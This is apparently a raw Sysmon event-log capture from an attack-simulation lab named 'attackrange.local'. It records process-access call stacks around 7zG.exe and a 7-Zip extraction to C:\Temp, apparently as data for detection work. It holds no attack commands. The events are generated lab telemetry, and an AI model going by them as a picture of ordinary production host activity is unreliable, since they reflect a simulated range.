10:44:45.476{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.476{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.476{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.460{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.460{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.445{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.445{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.445{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.445{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.398{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.335{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.288{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.288{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.288{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.288{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.226{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.226{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.226{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.226{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.226{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.226{C8EA50B7-F2AD-6215-C000-000000003802}48565992C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\7-Zip\7-zip.dll+545c|C:\Program Files\7-Zip\7-zip.dll+67e5|C:\Program Files\7-Zip\7-zip.dll+6fbe|C:\Program Files\7-Zip\7-zip.dll+70d9|C:\Program Files\7-Zip\7-zip.dll+8e20|C:\Program Files\7-Zip\7-zip.dll+c301|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+17c35c|C:\Windows\System32\SHELL32.dll+19eb28|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17c600|C:\Windows\System32\SHELL32.dll+179a7e|C:\Windows\System32\SHELL32.dll+73861|C:\Windows\System32\SHELL32.dll+76746|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15 154100x8000000000000000286685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.218{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe21.077-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Temp\" -an -ai#7zMap17155:60:7zEvent3078C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=300B8E1F636DCDE7269EF18600493819,SHA256=3AEF7662DCDBBC952A3ECD3677DA943EF3D4AECB5BD624625B6B176B1B5CE617,IMPHASH=C60649CDE63EC51599F93CD2D0157322{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000286684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.007{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C16FAE2CF5B1A5114CCAC2A34E43B5D,SHA256=31A7F5175B4494F3FB3371AC341B987444D178ABD818CDB159E8BB9A048BE44B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-101D-6216-2D04-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 